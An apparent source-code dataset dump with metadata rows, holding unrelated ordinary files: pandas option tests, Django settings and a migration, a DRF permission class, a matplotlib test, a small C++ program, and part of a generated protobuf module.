self.cf.set_option("a", "ab")
msg = "Value must be a nonnegative integer or None"
with pytest.raises(ValueError, match=msg):
self.cf.register_option(
"a.b.c.d3", "NO", "doc", validator=self.cf.is_nonnegative_int
)
with pytest.raises(ValueError, match=msg):
self.cf.register_option(
"a.b.c.d3", -2, "doc", validator=self.cf.is_nonnegative_int
)
msg = r"Value must be an instance of <class 'str'>\|<class 'bytes'>"
with pytest.raises(ValueError, match=msg):
self.cf.set_option("b.c", 1)
validator = self.cf.is_one_of_factory([None, self.cf.is_callable])
self.cf.register_option("b", lambda: None, "doc", validator=validator)
self.cf.set_option("b", "%.1f".format) # Formatter is callable
self.cf.set_option("b", None) # Formatter is none (default)
with pytest.raises(ValueError, match="Value must be a callable"):
self.cf.set_option("b", "%.1f")
def test_reset_option(self):
self.cf.register_option("a", 1, "doc", validator=self.cf.is_int)
self.cf.register_option("b.c", "hullo", "doc2", validator=self.cf.is_str)
assert self.cf.get_option("a") == 1
assert self.cf.get_option("b.c") == "hullo"
self.cf.set_option("a", 2)
self.cf.set_option("b.c", "wurld")
assert self.cf.get_option("a") == 2
assert self.cf.get_option("b.c") == "wurld"
self.cf.reset_option("a")
assert self.cf.get_option("a") == 1
assert self.cf.get_option("b.c") == "wurld"
self.cf.reset_option("b.c")
assert self.cf.get_option("a") == 1
assert self.cf.get_option("b.c") == "hullo"
def test_reset_option_all(self):
self.cf.register_option("a", 1, "doc", validator=self.cf.is_int)
self.cf.register_option("b.c", "hullo", "doc2", validator=self.cf.is_str)
assert self.cf.get_option("a") == 1
assert self.cf.get_option("b.c") == "hullo"
self.cf.set_option("a", 2)
self.cf.set_option("b.c", "wurld")
assert self.cf.get_option("a") == 2
assert self.cf.get_option("b.c") == "wurld"
self.cf.reset_option("all")
assert self.cf.get_option("a") == 1
assert self.cf.get_option("b.c") == "hullo"
def test_deprecate_option(self):
# we can deprecate non-existent options
self.cf.deprecate_option("foo")
assert self.cf._is_deprecated("foo")
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
with pytest.raises(KeyError, match="No such keys.s.: 'foo'"):
self.cf.get_option("foo")
assert len(w) == 1 # should have raised one warning
assert "deprecated" in str(w[-1]) # we get the default message
self.cf.register_option("a", 1, "doc", validator=self.cf.is_int)
self.cf.register_option("b.c", "hullo", "doc2")
self.cf.register_option("foo", "hullo", "doc2")
self.cf.deprecate_option("a", removal_ver="nifty_ver")
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
self.cf.get_option("a")
assert len(w) == 1 # should have raised one warning
assert "eprecated" in str(w[-1]) # we get the default message
assert "nifty_ver" in str(w[-1]) # with the removal_ver quoted
msg = "Option 'a' has already been defined as deprecated"
with pytest.raises(OptionError, match=msg):
self.cf.deprecate_option("a")
self.cf.deprecate_option("b.c", "zounds!")
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
self.cf.get_option("b.c")
assert len(w) == 1 # should have raised one warning
assert "zounds!" in str(w[-1]) # we get the custom message
# test rerouting keys
self.cf.register_option("d.a", "foo", "doc2")
self.cf.register_option("d.dep", "bar", "doc2")
assert self.cf.get_option("d.a") == "foo"
assert self.cf.get_option("d.dep") == "bar"
self.cf.deprecate_option("d.dep", rkey="d.a") # reroute d.dep to d.a
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
assert self.cf.get_option("d.dep") == "foo"
assert len(w) == 1 # should have raised one warning
assert "eprecated" in str(w[-1]) # we get the custom message
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
self.cf.set_option("d.dep", "baz") # should overwrite "d.a"
assert len(w) == 1 # should have raised one warning
assert "eprecated" in str(w[-1]) # we get the custom message
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
assert self.cf.get_option("d.dep") == "baz"
assert len(w) == 1 # should have raised one warning
assert "eprecated" in str(w[-1]) # we get the custom message
def test_config_prefix(self):
with self.cf.config_prefix("base"):
self.cf.register_option("a", 1, "doc1")
self.cf.register_option("b", 2, "doc2")
assert self.cf.get_option("a") == 1
assert self.cf.get_option("b") == 2
self.cf.set_option("a", 3)
self.cf.set_option("b", 4)
assert self.cf.get_option("a") == 3
assert self.cf.get_option("b") == 4
assert self.cf.get_option("base.a") == 3
assert self.cf.get_option("base.b") == 4
assert "doc1" in self.cf.describe_option("base.a", _print_desc=False)
assert "doc2" in self.cf.describe_option("base.b", _print_desc=False)
self.cf.reset_option("base.a")
self.cf.reset_option("base.b")
with self.cf.config_prefix("base"):
assert self.cf.get_option("a") == 1
assert self.cf.get_option("b") == 2
def test_callback(self):
k = [None]
v = [None]
def callback(key):
k.append(key)
v.append(self.cf.get_option(key))
self.cf.register_option("d.a", "foo", cb=callback)
self.cf.register_option("d.b", "foo", cb=callback)
del k[-1], v[-1]
self.cf.set_option("d.a", "fooz")
assert k[-1] == "d.a"
assert v[-1] == "fooz"
del k[-1], v[-1]
self.cf.set_option("d.b", "boo")
assert k[-1] == "d.b"
assert v[-1] == "boo"
del k[-1], v[-1]
self.cf.reset_option("d.b")
assert k[-1] == "d.b"
def test_set_ContextManager(self):
def eq(val):
assert self.cf.get_option("a") == val
self.cf.register_option("a", 0)
eq(0)
with self.cf.option_context("a", 15):
eq(15)
with self.cf.option_context("a", 25):
eq(25)
eq(15)
eq(0)
self.cf.set_option("a", 17)
eq(17)
# Test that option_context can be used as a decorator too (#34253).
@self.cf.option_context("a", 123)
def f():
eq(123)
f()
def test_attribute_access(self):
holder = []
def f3(key):
holder.append(True)
self.cf.register_option("a", 0)
self.cf.register_option("c", 0, cb=f3)
options = self.cf.options
assert options.a == 0
with self.cf.option_context("a", 15):
assert options.a == 15
options.a = 500
assert self.cf.get_option("a") == 500
self.cf.reset_option("a")
assert options.a == self.cf.get_option("a", 0)
msg = "You can only set the value of existing options"
with pytest.raises(OptionError, match=msg):
options.b = 1
with pytest.raises(OptionError, match=msg):
options.display = 1
# make sure callback kicks when using this form of setting
options.c = 1
assert len(holder) == 1
def test_option_context_scope(self):
# Ensure that creating a context does not affect the existing
# environment as it is supposed to be used with the `with` statement.
# See https://github.com/pandas-dev/pandas/issues/8514
original_value = 60
context_value = 10
option_name = "a"
self.cf.register_option(option_name, original_value)
# Ensure creating contexts didn't affect the current context.
ctx = self.cf.option_context(option_name, context_value)
assert self.cf.get_option(option_name) == original_value
# Ensure the correct value is available inside the context.
with ctx:
assert self.cf.get_option(option_name) == context_value
# Ensure the current context is reset
assert self.cf.get_option(option_name) == original_value
def test_dictwrapper_getattr(self):
options = self.cf.options
# GH 19789
with pytest.raises(OptionError, match="No such option"):
options.bananas
assert not hasattr(options, "bananas")
| [
"[email protected]"
] | |
5f0784ef8ebaf4b89a25a06905196b48dbd2da46 | db652288d2a5da615c3026cb49e7e66c4c68b2b1 | /website/welree/migrations/0003_auto_20150203_1526.py | 5e8441e2c94dba59036eb731f0ce18162a52c977 | [] | no_license | dhanuagnihotri/Welree-Website | a6b76ba6be47617ff4585fdf254460abc1aa7c59 | 899ed8de4eadc2411b5fee0588a1ed756fb5325e | refs/heads/master | 2021-01-21T03:38:00.119591 | 2015-08-19T17:31:18 | 2015-08-19T17:31:18 | 29,544,497 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 561 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('welree', '0002_customuser_is_designer'),
]
operations = [
migrations.AlterField(
model_name='customuser',
name='is_designer',
field=models.BooleanField(default=False, help_text=b"We'll use this to customize your experience on Welree.", verbose_name=b"I'm a jewelry designer"),
preserve_default=True,
),
]
| [
"[email protected]"
] | |
d6e93df4cf85a0b82684bc63ef054e46fd0cd165 | 6bc7062b2f99d0c54fd1bb74c1c312a2e3370e24 | /crowdfunding/users/permissions.py | 5b18344a04da371391dd876904d9dae8001cae2e | [] | no_license | marinkoellen/drf-proj | f2d1f539efb877df69d285bd2fe6d5e789709933 | 874549d68ab80a774988c83706bb7934e035de42 | refs/heads/master | 2022-12-25T16:53:52.187704 | 2020-10-03T03:54:06 | 2020-10-03T03:54:06 | 289,620,536 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | py | from rest_framework import permissions
class OwnProfile(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
if request.method in permissions.SAFE_METHODS:
return True
return obj == request.user
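# Typical wiring (illustrative, not part of the original file):
#     permission_classes = [OwnProfile]
# on a user detail view lets safe (read-only) methods through for everyone,
# while writes succeed only when the object is the requesting user.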
| [
"[email protected]"
] | |
371b4a3ef74327f5b87793eb24cc846c854d2160 | 9ca8da461ac27ad18ceee5e81a60b17e7b3c4a8c | venv/Lib/site-packages/matplotlib/tests/test_ttconv.py | 3bbe7af9c73844ce54a7320e0c963ddf605e1b8e | [] | no_license | LielVaknin/OOP-Ex3 | 1c2e36436ffe6b701e46efec77d4beb4aba711bf | 4b830b6806c6d8013332992241dce01cc81634d7 | refs/heads/master | 2023-02-11T05:10:20.460355 | 2021-01-14T18:18:22 | 2021-01-14T18:18:22 | 328,455,478 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,150 | py | 
from pathlib import Path
import matplotlib
from matplotlib.testing.decorators import image_comparison
import matplotlib.pyplot as plt
@image_comparison(["truetype-conversion.pdf"])
# mpltest.ttf does not have "l"/"p" glyphs so we get a warning when trying to
# get the font extents.
def test_truetype_conversion(recwarn):
matplotlib.rcParams['pdf.fonttype'] = 3
fig, ax = plt.subplots()
ax.text(0, 0, "ABCDE",
font=Path(__file__).with_name("mpltest.ttf"), fontsize=80)
ax.set_xticks([])
ax.set_yticks([])
| [
"[email protected]"
] | |
28b184b624819b1c5d9358d7ca85f7b19ddc8eb9 | e00130d5aa146c344c8c31a491ced75e3c41463a | /agentzero/version.py | 3589800bd14458e7efe469103396f42a3e578825 | [] | no_license | gabrielfalcao/agentzero | 9b0eb0cc9b7076786d5b5c6821ca28a1dc2dbf19 | ee18af5b7fdbb77540e7658d3f85c8a7b76f8bc9 | refs/heads/master | 2023-01-11T02:48:57.661321 | 2022-12-27T20:12:55 | 2022-12-27T20:12:55 | 52,629,552 | 10 | 1 | null | 2019-12-20T17:18:39 | 2016-02-26T20:05:23 | Python | UTF-8 | Python | false | false | 65 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
version = "0.4.6"
| [
"[email protected]"
] | |
119cf069fba05ec41726845576cf1a5f7597599c | 788965833baa87fec02520ebccde379bf03198bc | /askcompany/settings/common.py | 3cbb1f9fc7b5a61b00f31452e4465a468f4f49d3 | [] | no_license | sungchan1025/django-with-react-rev2 | e907bfb464a1a9ed0061d5829257558426335fcd | 62bf5b5e57e8c791e0c74bf4e496f3bc79de8c4b | refs/heads/master | 2022-04-07T03:11:39.990147 | 2020-02-16T05:50:50 | 2020-02-16T05:50:50 | 273,150,775 | 1 | 0 | null | 2020-06-18T05:36:54 | 2020-06-18T05:36:54 | null | UTF-8 | Python | false | false | 4,025 | py | """
Django settings for askcompany project.
Generated by 'django-admin startproject' using Django 3.0.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
from os.path import abspath, dirname
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = dirname(dirname(dirname(abspath(__file__))))
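# (added note) The three dirname() calls climb from askcompany/settings/common.py
# up past settings/ and askcompany/, so BASE_DIR points at the project root.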
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '(2%h=*epx5m=qapxh+5o=$6_6lk^lsikbbw3udc#k=s_xd2mzm'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
ADMINS = [
('Chinseok Lee', '[email protected]'),
]
# Application definition
INSTALLED_APPS = [
# Django Apps
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.humanize',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# Third Apps
'bootstrap4',
'debug_toolbar',
'django_pydenticon',
'easy_thumbnails',
# Locals Apps
'accounts',
'instagram',
]
MIDDLEWARE = [
'debug_toolbar.middleware.DebugToolbarMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'askcompany.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'askcompany', 'templates'),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'askcompany.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
AUTH_USER_MODEL = "accounts.User"
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'askcompany', 'static'),
]
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
INTERNAL_IPS = ['127.0.0.1']
# Email with Send Grid
SENDGRID_API_KEY = os.environ.get("SENDGRID_API_KEY")
EMAIL_HOST = 'smtp.sendgrid.net'
EMAIL_HOST_USER = 'apikey'
EMAIL_HOST_PASSWORD = SENDGRID_API_KEY
EMAIL_PORT = 587
EMAIL_USE_TLS = True
WELCOME_EMAIL_SENDER = "[email protected]"
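# Example use of the settings above (illustrative, recipient is hypothetical):
#     from django.core.mail import send_mail
#     send_mail("Welcome", "Hello!", WELCOME_EMAIL_SENDER, ["[email protected]"])
# relays the message through smtp.sendgrid.net using the API key credentials.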
| [
"[email protected]"
] | |
6bda908e9230dfb4ccd5c22e157ae0537128b390 | cf543dda5dc841b3eb7063d78821fbbdbd8f9d60 | /tests/conftest.py | 7ebcb25452700b0c985871fb03296261e0d46991 | [
"BSD-3-Clause"
] | permissive | mdxs/json-spec | 2b66a9b792210188788a04138e8e2e9fea4aed89 | f093a2d47e899990e023a13a29f94b9aebdae5ab | refs/heads/master | 2021-01-18T03:14:28.420809 | 2015-07-07T14:34:37 | 2015-07-07T14:36:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 177 | py | import sys
def pytest_cmdline_preparse(args):
if 'pytest_cov' in sys.modules: # pytest-xdist plugin
args[:] = ['--cov', 'jsonspec', '--cov-report', 'html'] + args
| [
"[email protected]"
] | |
2b35f8032e339afc72a833ccfba443d92be9e9e2 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/Cases/2937/.mooctest/answer.py | 075d4f8539d3f652a78d8e28ff7dc8eaa60bc42f | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 586 | py | #include<iostream>
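// Worked example (added): the input "CODEFESTIVAL2O16" differs from the target
// "CODEFESTIVAL2016" built in b[] only at index 13 ('O' vs '0'), so it prints 1.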
using namespace std;
char a[17], b[16] = {'C', 'O', 'D', 'E', 'F', 'E', 'S', 'T', 'I', 'V', 'A', 'L', '2', '0', '1', '6'}; // plain char arrays keep the comparison simple; a[] gets one extra byte for the '\0' that cin appends after the 16 input characters
int ans; // the answer; globals defined outside any function are zero-initialized
int main()
{
    cin >> a; // no need to read character by character: the input is always exactly 16 characters long
    for(int i = 0; i < 16; i++){
        if(a[i] != b[i]) ans++; // compare position by position; count every mismatch
    }
    cout << ans << endl; // endl is optional here
    return 0; // good habit
}
| [
"[email protected]"
] | |
724cb5e6e6271b7e8dbf448bcc2f40bfd0712d1f | 87fecbc5b4e6ae4b2a0c32c45e20eb1fec2ebcdd | /Siyam Solved/Problem Set -2/Solutions- 2/7.py | d9e973e8e12bc7f464b259713babb0d6a8e4b005 | [] | no_license | siyam04/python_problems_solutions | 08aa2bc17342ee85fdcd90ef96bd8eeed0699726 | 7b271d98e4d600bca31061e57ce792f5d9913991 | refs/heads/master | 2020-06-27T22:56:48.973484 | 2019-08-01T15:33:18 | 2019-08-01T15:33:18 | 200,075,594 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 293 | py | def EvenCount ():
    count = sum(1 for i in range(1, 9) if i % 2 == 0)
    return count
def OddCount():
    count = sum(1 for i in range(1, 9) if i % 2 != 0)
    return count
print("Total EVEN numbers are:", EvenCount())
print("Total ODD numbers are:", OddCount())
| [
"[email protected]"
] | |
edb496f47578df1e8327f71f94f3e27bce57874f | 0fc27c29f508a3b0f38f1bab10c543903306aa93 | /python/machinetalk/protobuf/object_pb2.py | f10339ae4595542f8f277705b24208435be5a9c6 | [
"MIT"
] | permissive | luminize/machinetalk-protobuf | 91604f6a933e1feb6ccf80e05caf86ad649c1a5a | 6ca7c99806401179ece164b07dc87852bfa8df9c | refs/heads/master | 2020-05-23T22:16:34.309507 | 2018-11-14T06:53:25 | 2018-11-14T06:53:25 | 186,970,319 | 0 | 0 | MIT | 2019-05-16T06:58:34 | 2019-05-16T06:58:31 | null | UTF-8 | Python | false | true | 69,227 | py | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: machinetalk/protobuf/object.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from machinetalk.protobuf import nanopb_pb2 as machinetalk_dot_protobuf_dot_nanopb__pb2
from machinetalk.protobuf import types_pb2 as machinetalk_dot_protobuf_dot_types__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='machinetalk/protobuf/object.proto',
package='machinetalk',
syntax='proto2',
serialized_pb=_b('\n!machinetalk/protobuf/object.proto\x12\x0bmachinetalk\x1a!machinetalk/protobuf/nanopb.proto\x1a machinetalk/protobuf/types.proto\",\n\x08Instance\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\n\n\x02id\x18\x02 \x01(\x0f:\x06\x92?\x03H\xbc\x05\"\xb7\x01\n\x13ServiceAnnouncement\x12\'\n\x05stype\x18\x01 \x02(\x0e\x32\x18.machinetalk.ServiceType\x12\x12\n\x07version\x18\x02 \x02(\x07:\x01\x30\x12\x13\n\x08instance\x18\x03 \x02(\x07:\x01\x30\x12$\n\x03\x61pi\x18\x08 \x02(\x0e\x32\x17.machinetalk.ServiceAPI\x12\x0b\n\x03uri\x18\x06 \x02(\t\x12\x13\n\x0b\x64\x65scription\x18\x07 \x01(\t:\x06\x92?\x03H\xbd\x05\"\xab\x01\n\nOriginator\x12\'\n\x06origin\x18\x01 \x01(\x0e\x32\x17.machinetalk.OriginType\x12)\n\x06\x64\x65tail\x18\x02 \x01(\x0e\x32\x19.machinetalk.OriginDetail\x12\x0c\n\x04name\x18\x03 \x01(\t\x12\n\n\x02id\x18\x04 \x01(\x0f\x12\'\n\x08instance\x18\x05 \x01(\x0b\x32\x15.machinetalk.Instance:\x06\x92?\x03H\xbe\x05\"\x8b\x01\n\x07\x41nError\x12\x12\n\nerror_code\x18\x01 \x02(\x0f\x12\'\n\x08severity\x18\x02 \x01(\x0e\x32\x15.machinetalk.Severity\x12\x12\n\nerror_text\x18\x03 \x01(\t\x12\'\n\x06origin\x18\x04 \x01(\x0b\x32\x17.machinetalk.Originator:\x06\x92?\x03H\xbf\x05\"\x8e\x02\n\x03Pin\x12$\n\x04type\x18\x01 \x01(\x0e\x32\x16.machinetalk.ValueType\x12\x0c\n\x04name\x18\x02 \x01(\t\x12\x0e\n\x06handle\x18\x03 \x01(\x07\x12)\n\x03\x64ir\x18\x04 \x01(\x0e\x32\x1c.machinetalk.HalPinDirection\x12\x0e\n\x06halbit\x18\x05 \x01(\x08\x12\x10\n\x08halfloat\x18\x06 \x01(\x01\x12\x0e\n\x06hals32\x18\x07 \x01(\x0f\x12\x0e\n\x06halu32\x18\x08 \x01(\x07\x12\r\n\x05owner\x18\t \x01(\x0f\x12\x0e\n\x06linked\x18\n \x01(\x08\x12\x0f\n\x07oldname\x18\x0b \x01(\t\x12\x0f\n\x07\x65psilon\x18\x0c \x01(\x01\x12\r\n\x05\x66lags\x18\r \x01(\x07:\x06\x92?\x03H\xc0\x05\"\xe6\x01\n\x06Signal\x12$\n\x04type\x18\x01 \x01(\x0e\x32\x16.machinetalk.ValueType\x12\x0c\n\x04name\x18\x02 \x01(\t\x12\x0e\n\x06handle\x18\x03 \x01(\x07\x12\x0e\n\x06halbit\x18\x05 \x01(\x08\x12\x10\n\x08halfloat\x18\x06 \x01(\x01\x12\x0e\n\x06hals32\x18\x07 \x01(\x0f\x12\x0e\n\x06halu32\x18\x08 \x01(\x07\x12\x0e\n\x06strval\x18\t \x01(\t\x12\x0c\n\x04\x62lob\x18\n \x01(\x0c\x12\x0f\n\x07readers\x18\x0b \x01(\x07\x12\x0f\n\x07writers\x18\x0c \x01(\x07\x12\x0e\n\x06\x62idirs\x18\r \x01(\x07:\x06\x92?\x03H\xc1\x05\"\xa2\x02\n\x05Param\x12$\n\x04type\x18\x01 \x01(\x0e\x32\x16.machinetalk.ValueType\x12\x0c\n\x04name\x18\x02 \x01(\t\x12\x0e\n\x06handle\x18\x03 \x01(\x07\x12\x0e\n\x06halbit\x18\x05 \x01(\x08\x12\x10\n\x08halfloat\x18\x06 \x01(\x01\x12\x0e\n\x06hals32\x18\x07 \x01(\x0f\x12\x0e\n\x06halu32\x18\x08 \x01(\x07\x12\x0e\n\x06strval\x18\t \x01(\t\x12\x0c\n\x04\x62lob\x18\n \x01(\x0c\x12+\n\x03\x64ir\x18\x0b \x01(\x0e\x32\x1e.machinetalk.HalParamDirection\x12\x0f\n\x07oldname\x18\x0c \x01(\t\x12\r\n\x05owner\x18\r \x01(\x0f\x12\x0f\n\x07runtime\x18\x0e \x01(\x0f\x12\x0f\n\x07maytime\x18\x0f \x01(\x0f:\x06\x92?\x03H\xc2\x05\"\xca\x01\n\x08\x46unction\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0e\n\x06handle\x18\x02 \x01(\x07\x12\x10\n\x08owner_id\x18\x03 \x01(\x07\x12\r\n\x05users\x18\x04 \x01(\x07\x12\x0f\n\x07runtime\x18\x05 \x01(\x07\x12\x0f\n\x07maxtime\x18\x06 \x01(\x07\x12\x11\n\treentrant\x18\x07 \x01(\x08\x12\'\n\x04type\x18\x08 \x01(\x0e\x32\x19.machinetalk.HalFunctType\x12\x19\n\x11maxtime_increased\x18\t \x01(\x08:\x06\x92?\x03H\xc3\x05\"\x94\x01\n\x06Thread\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0e\n\x06handle\x18\x02 \x01(\x07\x12\x0f\n\x07uses_fp\x18\x03 \x01(\x08\x12\x0e\n\x06period\x18\x04 
\x01(\x07\x12\x10\n\x08priority\x18\x05 \x01(\x0f\x12\x0f\n\x07task_id\x18\x06 \x01(\x07\x12\x0e\n\x06\x63pu_id\x18\x07 \x01(\x07\x12\x10\n\x08\x66unction\x18\x08 \x03(\t:\x06\x92?\x03H\xc4\x05\"\xe6\x02\n\tComponent\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\r\n\x05ninst\x18\x02 \x01(\x07\x12\x0f\n\x07\x63omp_id\x18\x04 \x01(\x0f\x12\x0c\n\x04type\x18\x05 \x01(\x07\x12\r\n\x05state\x18\x06 \x01(\x07\x12\x13\n\x0blast_update\x18\x07 \x01(\x07\x12\x12\n\nlast_bound\x18\x08 \x01(\x07\x12\x14\n\x0clast_unbound\x18\t \x01(\x07\x12\x0b\n\x03pid\x18\n \x01(\x07\x12\x0c\n\x04\x61rgs\x18\x0b \x01(\t\x12\r\n\x05timer\x18\x0c \x01(\x0f\x12\x10\n\x08userarg1\x18\x0e \x01(\x0f\x12\x10\n\x08userarg2\x18\x0f \x01(\x0f\x12\x1d\n\x03pin\x18\x10 \x03(\x0b\x32\x10.machinetalk.Pin\x12!\n\x05param\x18\x11 \x03(\x0b\x32\x12.machinetalk.Param\x12$\n\x05\x66unct\x18\x13 \x03(\x0b\x32\x15.machinetalk.Function\x12\x11\n\tno_create\x18\x12 \x01(\x08:\x06\x92?\x03H\xc5\x05\"\xee\x01\n\x04Ring\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0e\n\x06handle\x18\x02 \x01(\x07\x12\r\n\x05owner\x18\x03 \x01(\x0f\x12\x0e\n\x06stream\x18\x04 \x01(\x08\x12\x0e\n\x06wmutex\x18\x05 \x01(\x08\x12\x0e\n\x06rmutex\x18\x06 \x01(\x08\x12\x11\n\trtapi_shm\x18\x07 \x01(\x08\x12\x0e\n\x06reader\x18\x08 \x01(\x0f\x12\x0e\n\x06writer\x18\t \x01(\x0f\x12\x12\n\ntotal_size\x18\n \x01(\x0f\x12\x12\n\nscratchpad\x18\x0b \x01(\x0f\x12\x13\n\x0bring_shmkey\x18\x0c \x01(\x0f\x12\x11\n\tencodings\x18\r \x01(\x07:\x06\x92?\x03H\xc6\x05\"\xe5\x01\n\x06Member\x12&\n\x05mtype\x18\x01 \x01(\x0e\x32\x17.machinetalk.ObjectType\x12\x10\n\x08userarg1\x18\x02 \x01(\x0f\x12\x0f\n\x07\x65psilon\x18\x03 \x01(\x01\x12#\n\x06signal\x18\x04 \x01(\x0b\x32\x13.machinetalk.Signal\x12\x11\n\tgroupname\x18\x05 \x01(\t\x12\x0e\n\x06handle\x18\x06 \x01(\x07\x12\x1d\n\x03pin\x18\x07 \x01(\x0b\x32\x10.machinetalk.Pin\x12!\n\x05param\x18\x08 \x01(\x0b\x32\x12.machinetalk.Param:\x06\x92?\x03H\xc7\x05\"\x88\x01\n\x05Group\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0e\n\x06handle\x18\x02 \x01(\x07\x12\x10\n\x08userarg1\x18\x04 \x01(\x0f\x12\x10\n\x08userarg2\x18\x05 \x01(\x0f\x12\x10\n\x08refcount\x18\x06 \x01(\x0f\x12#\n\x06member\x18\x07 \x03(\x0b\x32\x13.machinetalk.Member:\x06\x92?\x03H\xc8\x05\"_\n\x12ProtocolParameters\x12\x17\n\x0fkeepalive_timer\x18\x01 \x01(\x0f\x12\x13\n\x0bgroup_timer\x18\x02 \x01(\x0f\x12\x13\n\x0brcomp_timer\x18\x03 \x01(\x0f:\x06\x92?\x03H\xc9\x05\"\x84\x01\n\x06Vtable\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0e\n\x06handle\x18\x02 \x01(\x07\x12\x10\n\x08owner_id\x18\x03 \x01(\x0f\x12\x0f\n\x07\x63ontext\x18\x05 \x01(\x07\x12\x10\n\x08refcount\x18\x06 \x01(\x0f\x12\x0f\n\x07version\x18\x07 \x01(\x0f\x12\x0e\n\x06vtable\x18\x08 \x01(\x06:\x06\x92?\x03H\xca\x05\"\xc9\x01\n\x04Inst\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0f\n\x07\x63omp_id\x18\x02 \x01(\x0f\x12\x0f\n\x07inst_id\x18\x03 \x01(\x07\x12\x11\n\tinst_size\x18\x04 \x01(\x07\x12\x0e\n\x06vtable\x18\x05 \x01(\x06\x12\x1d\n\x03pin\x18\x10 \x03(\x0b\x32\x10.machinetalk.Pin\x12!\n\x05param\x18\x11 \x03(\x0b\x32\x12.machinetalk.Param\x12$\n\x05\x66unct\x18\x13 \x03(\x0b\x32\x15.machinetalk.Function:\x06\x92?\x03H\xcb\x05')
,
dependencies=[machinetalk_dot_protobuf_dot_nanopb__pb2.DESCRIPTOR,machinetalk_dot_protobuf_dot_types__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_INSTANCE = _descriptor.Descriptor(
name='Instance',
full_name='machinetalk.Instance',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='machinetalk.Instance.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='id', full_name='machinetalk.Instance.id', index=1,
number=2, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
